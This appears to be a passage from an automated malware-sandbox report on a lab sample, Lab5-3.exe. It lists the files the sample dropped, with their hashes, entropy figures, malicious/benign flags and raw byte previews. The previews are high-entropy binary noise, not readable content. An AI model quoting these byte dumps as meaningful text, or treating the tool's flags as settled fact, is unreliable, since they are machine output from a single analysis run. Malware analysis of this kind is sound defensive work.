                                                                                                          MD5:97802B04C91320C5F543AA1C51BC1820
                                                                                                          SHA1:7A151B0298F48D90331780DD74BB830957C479D4
                                                                                                          SHA-256:745D4FE516D7CBF0A5F5BD17EF8DA355F0441AEFDD1F99CB14248180BBC2325C
                                                                                                          SHA-512:737B844DF713A12887E432F2606B685854C1054EA19ABC3E0555EDC9B4626F93D13DB6A85442CE3D9CD52C704DC1CD2044C75958EF42882329F1CFBFE8E51980
                                                                                                          Malicious:false
                                                                                                          Preview:._)..f.a.1T.b..?d(.F....?..Ej.Z.[.8k....`..|, ?....<....9.S.8...<....e...@.^w....tT......pEa2.\.8...i.}R.!..V...FlI....,.Mp".Q.~KN@.T.[n<....TN..I...=.u]....)......hv..;......o*..j...".....8.z.........d...m..=.'..z...c....(._n.. ..T...H)...S.@oe.#6..z2.....hK..l...."a......9U...4K...]a.W.h....."D.xZ.,.&(.aX...N....i.j.B..Xr..H.h.I....%.~.W[.q.........x.l.(..].7..;...2...(.;.8..T.f.R.fI...8......y?<1.v...(..g,'{......1o[.[:.H........D..-.K..3 ..e.....y...K..(.x5q(.#9hbb.}.-......t.E4IZ^.....2v}c.eE.D4Ot.....3f....j...c...e.,>{m....cNw.3...H....IL..H..@"yE;K.9tt.....obxp.. .....A.3......OU.w..<#..^...j.%.;$82.,.3.F.-o{..L....=N.i...V.9......M.."..WY_..2.j..z|...^..V.<..Z0\.`.Ow....n..'.b8.....T.....g\..^.....c.8...}.9..${\.37.Scs j..4|.w.Sg.&.. .;._.....g.th<;.R.7....Q.]..a.AH.S....:.W...a.._..Z...(...>..?.....?..B|....`h.,.#..hX..A...P]D.....{....0..#h:.7D}.tf...J..0.p. .a.........R...xR..<"....R.9.I. -..iH....t....b9y....z...Ve....r?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1984
                                                                                                          Entropy (8bit):7.91037288565963
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6Ns+pBoJ5r3iDWIHSHfUTid3hBaUoSGFcmeykEdEElU92i:j+pC5rGWiGx0uKeY2ElUJ
                                                                                                          MD5:9A8D48740939F65CA46E1106FB5F608C
                                                                                                          SHA1:D3D819C4D7ABAD551AE3A1556AD032082C5CA634
                                                                                                          SHA-256:E83095D2AD83B87C7964674FE7534665BBF7A23D997AB050E08C390FA2E2368E
                                                                                                          SHA-512:7414C75B922777F1DC65E78D59612B8DBBCFBAF4B3610AED1138CD98F5F024CCAD7873B2655E2E78AAE7E8064512114FEED0A01684F28E6CBBC83D1821625438
                                                                                                          Malicious:false
                                                                                                          Preview:...UF.a.q. .{.[..nS/2C...,K.F=.1...|.~~...o.N.......!b..OX.ytss".r1.F.!.7..[.....r......|nA^r.Z.@X.KP1U..7..k.[-...L.4....c..."...-.uQWAP.RXi...$....U...Z.e;E..Z..Q....O....,.J..T.wi2.3..X..>........42...oV.3N..u...W.l..}W..^a^.I..B.s.BI.\..TI.zl.53..hH..;-;!...=.V<.. R..\_.5....\./x.~.J<..;........}D-A..P..\..K.w.F......1.........&...M'Q..I.QN......6......$...v.~B.....h.u....>o.$...vU........w....,`g.......F..]8.~>:..*..[]..*|..{..[i......k/]..ph..6pQg.........'5=.......-.9...[..n..j.{..g+...[ay(.....*.q7Y...V..<..fz(x2..|{.5`.?.._.....:?..u..2.l-...F.Y...x..f....C.w.:.'.Q..m.O.4|....p..<[.d.[*{l.B..g..U8A;.P\...3......Y@....P ...l...#..0|..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.918460297750139
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kj7LXVDsKgE/fKzotRNPXsVz9FHfUTid3hBaUoSGFcmeykEdEElU92i:O7BPD/eGRhXsNgGx0uKeY2ElUJ
                                                                                                          MD5:6BA0AC1DCA3718DA487AB902A578A6AE
                                                                                                          SHA1:15F633DE5678BB82C75836DDC002C11949014C04
                                                                                                          SHA-256:03F41EB8EB40E7D530FD91989CB9EC7187469C22B61B4AA7ABDE5CEC7F603C4B
                                                                                                          SHA-512:CB1BDBB8278A283A4E6B83EF0D5A17F7BCC066122279E6B277559E4AE67AFA739BF0BD168F806D3DE7A3905597D336B8E8C750F4518FFE804604AAFEE0645F06
                                                                                                          Malicious:false
                                                                                                          Preview:[A.%..A.9.Y!....>..|...\..W.]-ic'f).....O3.JR...I~0J.....i..w.....$..Mm....D..OV?..Ny.......Q8.)..4..O.!....~.....d........l.$....c....&..c.Baqp..9!....W..........m3|..Y&V.......W..h....]mP..s&..L.@"-.....n.wW..Zp......@.....Up... }...M0,..{.\VW5Y.O..mL.Fh5.k..3..6v...4...W.....M.nm...Q...|.&....`..-.Ve!pX.a...b3f!..\.+.tM.<.%.=.%..J.:.KF......@_.]....%}.Un!U(\..L......D.GW...B<.1.K..NJq..b...v..4..x.....~.{..W.d...y........}b..iu#..h..L.i1...v.e@4 .z.!6...t1.!....9u..0..FA....K..K.X.7.......8g..a....b.L..".F.6y.v4..Mu#....0_.]#.%.eI.C|...k.....g..R..<....].r....W#...X.....[..@...|.gf$....U,.3ZM..O..;...zpe.fH....C..0....d.S.='..M...8.2.....6..Bk....^.G.n.......~sf...H..<g..,.HA...[M.....T..O.@...ig...<9O.R.F..l.....lB.....s......,..PR.3.=.x.e......-.u;.....>;U.N`.....u;Y"....p.Y..........@.7.b.f(.a.y.Fi..B..1.\....I.....F.y.s.._..h.`.`t..g...p..pZ......k-g!...b.3k....b...y.Kg#l......@>m...............$.+/IR.....Y...I..yo)....)K...h/J
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3904
                                                                                                          Entropy (8bit):7.951534867994039
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:j3n+VpJDSPs11yTVVQ1IvN0FOnDezKnYorNGx0uKeY2ElUJ:jOLJ0sKztqQsKn80Cb
                                                                                                          MD5:B7E33BB527248B0939AF25B73E0AFE21
                                                                                                          SHA1:45FC7E76397AC86A730BF1FB9655F044EB0DC119
                                                                                                          SHA-256:4746F3E88731F357B29B7F1080D7AF6217E93FE37447F6F6C82732A7780D2E58
                                                                                                          SHA-512:5D6DE10849F770AF947F2491EB0F7C01E2EF0E9A59E38672C21093E1F72EAD025CD6FA3BAA54F16FFCE292E440A11C791FEA45EDAA889C8DBBFD5BDCEEE5F683
                                                                                                          Malicious:false
                                                                                                          Preview:...+-'>.oHc.Z=1.c.%q...Q*.bQ.7&@.).3....N.y._.".}.;.{.G..[...Sp...@.1..EaaPy...k....b..X.].X...-.Tt?..6..4.uC.....oD|4_.+.G.R.8./.0.d...LU..m.i..../..qv}3_f...R..1......fdH.1c.qEi...9A...(..-.}`...;....8Ft...Ei..CAQ..'..|..JI (.'.x ...a..#......].D..i...V.N.$n)...7w..4....I0...6_5..-..]..d...Q.M..pK`.,v"d..m.........F.u!....zi48...G.^!8.S:..r.W..j...,z.U......<...}...B..j..j.c......@...:.d'..'..}..8.N...^.z.U....$.-.jT.0..%"C.F.(.....H.I.R.a..U...as....E1...."....6.....6`V...l./.9D......L%..S.z.C).y..{..U..[.Vf4.".K4.....<x ....FY.@.DW...K...Z.Q3...].Ex...0...D...........<Tw9..k...@..`..M...y..f:.|..:..K...|.&;..FEe...C......B.Kj.......8.}x.q.R-.F$1.%.NG.&.P..wM.;.$.II.....v....K....o....a.>....l.%./..P.IFP.m."Tz$.E....=..-x.|Z.uC6.p..Z..f3.7r.x.t.>3V-.$.....$;.VM...`z..=b?.}.S.z...TG2..t..B..Y.o.,e.5...d.p....}..3....l....@.u.t.W0A#2.@...h.D?._.3......).+.......}......<`.Oh\.yS7.~j_.o.3...}..9k.&.r..t...A_...O.....C. .....2I.$-..Y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.933749795452287
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0irNgJYTGAVhWXEfzmxn9bN8rI8HrHfUTid3hBaUoSGFcmeykEdEElU92i:draaTpaXEf6R9i08H4Gx0uKeY2ElUJ
                                                                                                          MD5:B8FB9681C8A79AD89950B224AB9F5BE1
                                                                                                          SHA1:8A24938EAAFBF8BEA04543ECE98EF1CE875CAFAA
                                                                                                          SHA-256:CA43912D40E34A13BE435EFB13D1B230D04068175BACDE49CE2E81C3F56F1F96
                                                                                                          SHA-512:D6D3353463169E81E2678C9E03BA70745BFA879FE18BCAF2B7B13D94D7439458E0E2A57294463C6F33BEB36DD6374C82B25A5D1FF34CDDA82B6A0CBB0B0D5DE5
                                                                                                          Malicious:false
                                                                                                          Preview:e..._.><l.......p7...?.hb.MG..~9..>..?'.U.#.X.....FS..R?......N+..K..CE........k........R{E...^..F[.8.*.K:......."'...7)........E....q.I.3..m...-.......d..q.....t]..Ey.wl.c..$u..d..;.2....y...*....U.E.4q..Z;N.2)./.D.f.a.,%..... u.8.|D...C.....X'.~.~.OQ.g..`...%..Fe..../.......d.......st...8.&~.U?...v.S.....R.V.........tg|C7\..4B.t.V..].....*...."...W.[x..m..._..P.....jO..fR.|.....D{]....@r..G..%.'..Ea....s'DW.BR.....vT.4..z..jw..`.}....C..+.N.........W.l.).|.S...z.V..?.ZG.Aa.$....N...a....'...#.q...E..".^g9.AwnK....c..y..X<.c3.MYw.T.A...ygX.._,..2.j@|c..G.I#p..Q.eE#.h..z<..z....d9P...".r.F=~?a.F.Oi.&e&..kLC..q.z.Z..:\.1....<.K...D.$.j.......#...F..").P.....U.Wr.J.2_<e.....^I...Da]..&)...;9..'.a#.TC^B..BS....K.M...|........m...M...t..AE..|R.I..O.).E.|./....c...B..H@P.7T.....&.'Bs)^vn..J...\O..Tx.}..u._..?........S...JCOk7..X.d.Y.w.U...G..L........M3So..,;o...!..i.o...S...by......sC.rj../.IB...9...........1..}....$9.bX.=.......E..Z.0.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11872
                                                                                                          Entropy (8bit):7.9859710617968105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:82ELhq1UPt/VVq5dnVnvJAveC0uK/CfF3GyyjV9PgOuCp1C10Cb:GLhLP9Wv+wv6dnCPgK7stb
                                                                                                          MD5:8610DA2C8EDAEACEF3796BDECE8C8517
                                                                                                          SHA1:4449D06C8AC2842D5CD1AC8567CAAD18BC83AAA9
                                                                                                          SHA-256:9797190ED47C91E0987DE5574B029D16134ED53E9315509EA95B3BDF4A12B107
                                                                                                          SHA-512:9C9B93CDE944CE1166E726A155040DC2E9E4952F0F2457F0FBFAAA254606477F3CCF3C60BE545C006816FA6E8598475E470491F1D505099577760495279374D7
                                                                                                          Malicious:false
                                                                                                          Preview:.`6....3.$.1...........i.g.;D8^I.C..?..P..tc...'.........$..O..}.f.....h...]....;....8......L\.7..-.N_....0.._...U._.....p..T..d........sq..h.m......=.%...f.J.D.`.Y.....T.......Z./~X..%...............T|.pGS...bf%GJ.......A....|.si0vl.=.......U>,0@..~>:X. .9.f...M.b..6.,V..V)PoQ.....{.se.-...k.....(Q.017......V.D..D...Xx.s.......!..k.4.r~....].1.m..Y.@......8..]..UBc../...^.l{%...*x.Izi..9.....6t..:....'..8H....\;.>k...1..5......;.r,.!.Z.w./....i..z...WYo..+..%...V.Y..`.!.3..?C0.2a....=........*..e@...E...=(...z..&Vm.G.....@xip.............`.C.v8..`.W..Y..5...|...r..8...p.A.L......I....+..4cMC....d.b?.....U..H,...X...N.O.nm.....|..x.%wiW..X.l.V.......#B..y..C.R...4z.+o..(.g..P'.9.....Si....1../.../9:L........Qx7.k..WQ..A...Z..v.....3...P.p.J.S.~......_..a.kE.7...|.6...-.....r.......p....Iv$.N.......%..9..`....x..g.!....a@L...B....d..........`..<.|.a...7..:/...$6o...6...+.....D.v..C.`.t.R.+..#..IGQ..j..,....0.L....V.x..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33728
                                                                                                          Entropy (8bit):7.993263593750877
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ABQVTYeastn6q+o2medaAOpDxAO/1xALqj2FVHb4geeKJgxMjWZ:KQLLV6kmIpEiO3xx6WZ
                                                                                                          MD5:38C5F7BBF1B02882498525FF12ADABE8
                                                                                                          SHA1:5A454B870DFF56B8CD86C19B42F9B65B1FC80DE8
                                                                                                          SHA-256:BA0391EEEA9D6E60507C21D7A2FA0D3C3486007F94C55988D25E1637AC92C649
                                                                                                          SHA-512:4F17FFFC5BEE779E7D26EAEDE8F9AB263E1DFBD4F0C2D3B2FD686623183D874988FE0F5DD60269B392C54530457B6D324BD75E1F9CAEA1656F3728B0274B2AC4
                                                                                                          Malicious:true
                                                                                                          Preview:.S..........p/.@..M.+..v/.#. ]......B..zFT..7..>..o.....Ug....y;..9v.-.s..S..N.Rh.U.?.\."..IpY..n8D.nP.{....T&I....s..w. ...mD.?.}..j7....$.w....D...>..#DxNaw..S-p0T.....#.D$.J...'........0.k5Qi0.O...?.....b...!....l.F..k..8.9`.:Y..!F.(.e..fC.4..w.../.{.pM$.`N.....*...1...E..:.WB...':..|.6.......Fe.$....^....K.D..r....d:...7....T8....n...r)*L<9z..O.....6$h...s.Q@.j.v./(...dn)......`..^..h.!.f.St...#.g...>.T.]L.l#....op....`..m..v.L.$.k.@.........:q...Xlu..-d..`..$qr.',.O..&^.'.....].....].I....E-^.;..!........t.o_.4PX...Q.r.G.e..ci...Q.;......!).M....Z3...<jEn)q"EA9..._...}U.I%..A.$`~T..>...p.....N.....\3..W.....c....L...<..=..0...(.4.T...)8^...$.t....}(.h..}.M...[.....s..."-}2...RQ..cC.d..7..ZRB.........:....N..._.a..J.W}#g.C.J.zl....;_..,i.....q.G/;N.9c#..f....>.....1.h.rL.\......x0.m..f...o.b.M7*#*......?Y...b.`.j..aG<...5..EB.........nn..QI.C0L....z...Fe5P3].\.;iRD........D....0.......(..;...7......G.)..........v....$z.]o4.Z .....+..K7l.F..v7.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.916025311072203
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Jp434JCYquLiw/p9E7bWvO267HfUTid3hBaUoSGFcmeykEdEElU92i:O44qmhWvNGx0uKeY2ElUJ
                                                                                                          MD5:8BE28A8A8F28D749A4BCBF378CE3DFCD
                                                                                                          SHA1:D75613EFD9D5C5B826CD13E0091107E1B5509591
                                                                                                          SHA-256:056F395CD553965AD67C16544DAD10D8ACB1BFDB2E5C3210C585163555878AFB
                                                                                                          SHA-512:8E6215BD1D3142347B703497E5A9406F83CA62D8C6C1B3F874DE9437D01C884703C9DF8A28C7989DF3A9217F8CA831A3BFE941C33C0AA0D75C9CCC09F73D4AE8
                                                                                                          Malicious:false
                                                                                                          Preview:NJy%..V...g....3w..m]*./.1v...4.P....\.N;.\...."....1..5fx...+\...T.6....JC...Z.4Z.....1..........`m..\..T..m.E.....6.........Z...H..t3......7.aT...?NS...D#j....e..y.'..sd....7...........f.[l.....h.'...O...5.B....8W.l..,WL.3.....c.c..s'..,..L.....6L.iP3w.dY..@l.^A..'.r..A.H..$.u.........3..j#...t..^H]j........+hU..w.I.,..m/mN...]....F..q.......0..I.....='......1C....<+Y....u{...{[x....r8..d.. u.%~.<...S.4g.3)...|'.h....g..{....^.'.Ud..v...4...-.@..f..vs.T...D.....Y..../.06b.).3}.y5......U.0yh...d[.0......x..O.U..p..T\..t.i<q._.)..(\w..VsWC.......}f........+..B..+l!....2k|k0....-.7......x.;.......yN/...<..=.8..{.../..>...#.{.~...;6...;.v&...e2 [.9.oR...GI...a$nT9....H..Nt..H..t.}.X..m..S..p.....x...1......M...N.7....z...y...f...U1..m..f.7.:.KU"....b.....sS9.j..;n.. ....,..Q.~.....W..c<...(...)..8....>.Z...N.@..!.v....}.a..I.."......../.R..7..Qa...A4..>.|.W....3$~FN.z.l.N,..X.....\sw..Wr....}}. .d.w.HoR.0J...fe.....h?.BK..,$.2...O.s....uO]A.U.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.940004829325835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GKaPtZpkoIbZlqsrN+Z+ZDPLPN5HfUTid3hBaUoSGFcmeykEdEElU92i:74PkldQsc+ZTj4Gx0uKeY2ElUJ
                                                                                                          MD5:13600B7E22942BC35349FE369B3049B5
                                                                                                          SHA1:76111B62253CB96147C33C5D0FA7275ED68B790B
                                                                                                          SHA-256:DFEC1647E85E409918EDE9D2405505AF865D87A0CFECFB34075E409576874215
                                                                                                          SHA-512:F8A465D48259B92C284F1CC79B4E9C76CC12AA10A7828725FC2F7B4E69D136CF536C67244C126D1F802F0EEABC1DDDF6D5FAD4DA693B73D96A12525063336222
                                                                                                          Malicious:false
                                                                                                          Preview:.......q@.GL.....A|.N.1....s.G..i../..h.f.......!.^....X.?.|.s[.]..-x...j.&....l................."..5~m..yh......5...'\&.....C....>%3.Lb[.I.k2_.0..3..R..4...M..@.&Z.R.9..d......$...0+.k:.|.'HgT.K..H.kI.A.").H.^..w..fR...Ka.....).*..._..-...r..).N..K......+...........n..|.k.mW.....j.Y..r..5...jDY?.IyVw..A.....:.....6.(U..........n.....%VpB.~..<KZ.../..A.#.cX.........._&.$`4.Lo.&..'.F..3&l.<A_B..6z...##$..H..E.g9>.S....B./....V..x.\s...........Do..d.....ZK+F.].."...i...`.K.17z.^.."..{..Ybd..D&..@hh>...p.q...*.6h.E..0b.L.>1"..*....N..i....~............<P.x.`..Cc..Z.g.y.N....A.@..pS.MW.&..T."..Xsd..v...0Fc.3o.V%7hU..Tw...v.r7mvv]..$H...'G............2.h..6..\...`..tU.#.........y.[i..J..tb..O..b..P.J..Pb...P<)..+g..g.......v'.;..gW..aub..U....>]q...h.C....%..P.B.D.B.3.c.I.h.EDv.r.k.@..d...j.@.......a..tJT...!U.1....WK...^j9..../...1..y$%...z.B..my.....8..j...SO'..V..L.~,_...o...T..[.....L.k...g..)....i....k.|i!...\..)7+..4_{..m{...z...y....f
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.9166627299184125
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SYcVROngjYA4Rf1VHfUTid3hBaUoSGFcmeykEdEElU92i:nct+fsGx0uKeY2ElUJ
                                                                                                          MD5:F8C2A8B367EA11332D1E56BAC7D29E98
                                                                                                          SHA1:B8C9189BA02226D08FB2DDAB4635901300537493
                                                                                                          SHA-256:284F12D53B8E5E9FBD62E995C05A52E680C5C1CDAC4CDE71E1404E67BC33603A
                                                                                                          SHA-512:927D5983F3FAB42AC40D9F2731E13A04528884CB3543865E709347CB3ACE68770EE3EE1B2B5383C8A5EBCF9D28C7B3030D17C0AA117991BF1D4A82FEA43ED73C
                                                                                                          Malicious:false
                                                                                                          Preview:...a. ...x.,...R....?.....t....9Q.!.;....B...w..3.j.'...w....&.NT..r...*..KN...z.A..g.....+.\.;/P..C.Z..N...M.E.....1.....J.....b.[...!.i.......,..i.gS....Y....z~@.F..k..Wu..b]a%....B:...E..Z.#..$....y|+.s.W.M?.*.{U.;.Y..7&...\Y.......CT..w..O+;..e....;......t.}..b6...R..c.D.N....V7..s4V.~......y.{.\-..=,2.....jtpWC..ZJ.H+...aQ`.......T...q....>?..N..)C.ic;.X-6..U-Ae.+}._....:.l.?....A....K?,....`.Y.B....6).C;..K.mJ{/E.z..L..K.........,+........[....l~7..8......A.F47..A.{{Y..}0MW.C.......s.>.Y.2..M..2.9..(..Z....u.2..s..H...B.8.C..J6.......2...8.l..+cz..[{:..p.O.w..X.9...pw..0:.V.qKq6>.z....8.7..^..k.....4..mG...^.-.I..]...'.......$..8......"..(..i..>n.'.ql.......O..[....i@Y..........8.1..,QKw}Yf...~K.*...&...;A. ..~.N.......6.........u.ZFGAf.#..))d..d...>Y.'..H.. ..?.a.X../...=za.2i.y..6.!..'..2..4...h..f9SA.=%.o..,.........JF.,.}.`..>..10n...K..R.`.l?\.. G..S.......ef.......It.....\.. ..|.eP...#...Y..(...8.....R.dg....:p6........SA.z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.932712175182181
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:llyUCX4dLt3NTYKcfjTRUojMHfUTid3hBaUoSGFcmeykEdEElU92i:WUcqNMKsPfLGx0uKeY2ElUJ
                                                                                                          MD5:C08B6874A045911CF255066D61AA7E5D
                                                                                                          SHA1:CC54A6886AA524B04360C71ECB50258DF32244EC
                                                                                                          SHA-256:13339E001985C431838BF7F95F539E7A1DE411BEC1D57F3E817E69B94D8E116E
                                                                                                          SHA-512:DD06BB9F4BDF83E6C306A34133B3E6D4F827A9554355AB385F3DBE858E32A432CC0CA70ACAE1F3DD3ECF4E4890560B931D23460A96E2661B2D7E108EC6D62706
                                                                                                          Malicious:false
                                                                                                          Preview:.,..Pi.......~..\2.!.....&D.z.`.6.U..o...x...^..1..j.,+.g...........8 O.<.r...<xE..<...<p........_!.Wu.I....{?.w.......j.~............>A....U.R....*I.j.?!.......$Sz..$..F..m.....6..A...l...1Yp...|.+.A..3...4..@.>.$i0.. e.....%..).g.>.B...%W...e.R.?. .......eKZ.E..5.|.....,...@....b$.d..8I.......;.u!r.l.T.c.HfO]...!!.p!_-..{.l..~...KV..5.x./.7\..Ps..p.d.X._$..eC....Vf.1......ZU8.A...C....-.6.s...._6.l.@..M....9.....Z.......a.>...^}...... .uM.Z7w=@D.n.X_[....t.R2fU..m*...cP._>.}.4t...lx. ]..g...=.}d.nF...u.1..R.w.9..............Fj...L^).z..y......]t...D.`:O...Z...4%.=(....p.A.[w.xTN(.8.k.....A0W@"Y......*..U....m.^...L.a.......d......J.........^..~....fp...@.\c.&..A..>.)Mx2.y.>..t...k....\/.2........S..#...?.Nb..n,....^,1.mP.....h....zs}.R..2f.......Z+.....qJQ...*.Y... e....k..A..Y..A....H.....p..q..Zd..@y....do\..I..p.4]....i.3{....8.w.Bc.&..h....h......g=.^........O...4..r.;6.........(.gZF.~T...O.o..;.....-.c..f..o..."...!.+TId2B8....3`W+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.934634103697811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:INeb7RQ5fFC5HkcdyaI2HfUTid3hBaUoSGFcmeykEdEElU92i:ia7aaFyaIJGx0uKeY2ElUJ
                                                                                                          MD5:40DA2EE46E365D978CF5EBA589844C14
                                                                                                          SHA1:E0F7B2BCC657E1190CC20A62D2D3115823145A6D
                                                                                                          SHA-256:8871BBE8F0F9DFCAEF4C5B4E9925258F2D077D552275B1BC70157B78E3759418
                                                                                                          SHA-512:627A07A93404AC0847193FB978FF4F9BB9A4890183CE42E36B1A19FE7E4813D6DEB8F71A6A88343DE3018C8C6E32AD66938F5D1294FB2E7BC7B8937D96456F6F
                                                                                                          Malicious:false
                                                                                                          Preview:...V...{`....F$Y..p..........S.........p.F.....p.W./V..%R'...A.....h.]...h?`O%.M9.{..-T-^..\.1.z~.#...z...K?E..I...|W.i..u... n..z.-.'..@9.*...mZfS...t=..~.m|.x0....*..P..#.(.UQ.. .1.i.P.~.?.g!.g.S.....=.R...Ip..#...@..f.m..A*...<.[=........\.h..k,.>...M.].Ey...Q..*|=.S^C...~!....:Q.....bx...:..\1.3I.i.:q,.o.h.-/....u.}.wy.vM..{.hM';.....B..W..;A.....c.t..58..Pk..#.D..r..o.:.3V.....a...C...........R......,..m|.OWZ~....G.JG..F..[f..oj*.......|.......s..Q..X.&..f..m(.....6-cy.i..%G..5;$2.6.N.y@..Pn.`....I^KZG*..DhAbm.g..N..Z..]..F...DE{.K....5:C.y.6G.H........C.B..!...&....{K2.P.k...H.d.....nt..C........'..c.&.D.we.....F. .y.J{.........;Nn..><... .5.Fw.:.Cg..`.$.&....F...i...#.a...jj.X}(..I.y.n.~..{Q\.>.e($.zr(.q...Xr.hog..n2.?n.....v..Q'.D.l.[..f .....|'y.......z..........J...h.R.v....G.8.x`&.#.....Y.JO.....9.\`..c..<.......CP......R..=..}i...h.\e.ss.s.....p;..B`MB.;....W.J+...$..Q..7F.M.........N..l.1...V.}.......g...(el.!z.k>.....|.=..dm.u.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.939993923709489
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PR2sQJJAH3TNHSu1HLDtdLnh54nWjMCDbHfUTid3hBaUoSGFcmeykEdEElU92i:PoHJSj0uBt5nUnWjMyoGx0uKeY2ElUJ
                                                                                                          MD5:62F6E183A31436F535C68F7FDE63E168
                                                                                                          SHA1:522129850210B7BADC4AD0A258C1322FE580ED72
                                                                                                          SHA-256:7E11A120128FDE9E6ADA25EFD2E4C291939568808230C82210A12799EC96E3E5
                                                                                                          SHA-512:13EE1B173AD5F70627F6C19E9A0A801D084D630AD0ABC5C96551DFC8FC14C33DE10FD609322735016A838071A4305F0CCA20D0298DF88508E2116B4847C216BA
                                                                                                          Malicious:false
                                                                                                          Preview:S...I......)Tt..!...[..z..#..r..k.w.`2k...'...g..e0.$.....x....[.(...5.5.|.z{..q...q#..bPzK......+.%..R......H.a.hPq...u........w...k......2..M..v..B;vX.0?L.....x.I.V.>r...X...c4.i.k.Pt..8.....$,F....`r....a.i.0.....5.uC..c./..~.K.C...3R...i0-Q......~....8.Nh..../q.D.Y`."2...!:'.aO.J....s/x.'j..e.;.@1...<.F.HzS.h..Dk.l.&..b...b.7.+.2*.&\.X[..[...[..q.g.u}..W..}...Z.2.8.E...........6x..-... ...J.8A.)...oh.q..K..5.....*....i. c..._..O@..az.X..F..\.Fj...2.k#].KiO..]`.H..pP.i..E.....v...83E. .}T..D9(e..=.M...H..E.S.......h..[{...^.0......B...,S...@....._p.....l.o.8.Nv.v....S...K].C.2......cT.....g.'.d:.Dat6.l.X....8..B .......<w.......q..... .m..A[>.R.TH.o.Q...a"J...w....{Z.V[C..J.rc..R.(l...f..KKJ..E.7$j^.@W...eO<...=.y;..%...n4.#....4...R....L..YI.3.fp..v1....l."..,5...]I.|X,,.3.2...6~V.....qE.d$s...C.....>[.-.....@.(E..r.4{.hx.j+......6a..9.."...W.....{...&..t.......Cj..Z.}..,.....,i......t;....'....z...3_.MM..w\.....I...... ..y..DA..38.>..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3024
                                                                                                          Entropy (8bit):7.936582629698409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Xwx2hmsvFJn8ff8cnVJmZ0XnWHJi+7t8NNtHfUTid3hBaUoSGFcmeykEdEElU92i:Xwx8m6FtS84Vo++ZjGx0uKeY2ElUJ
                                                                                                          MD5:903C304A45A41991A6C3162AE9D7F3BB
                                                                                                          SHA1:7AE273206F87D8354224E81E02F27E230128AFBF
                                                                                                          SHA-256:420459C718BB1E1B85ACB65C2692B5839C026C560023C65C458966E98D8E5F93
                                                                                                          SHA-512:DAD219B1486B018B4B9282E2CE17B68287332B362D8EB464975439A81F3FA3FB4176C4A067C7A7233C4763DCB589985CA6E57117759CA0EA1B540C5485C7B5B8
                                                                                                          Malicious:false
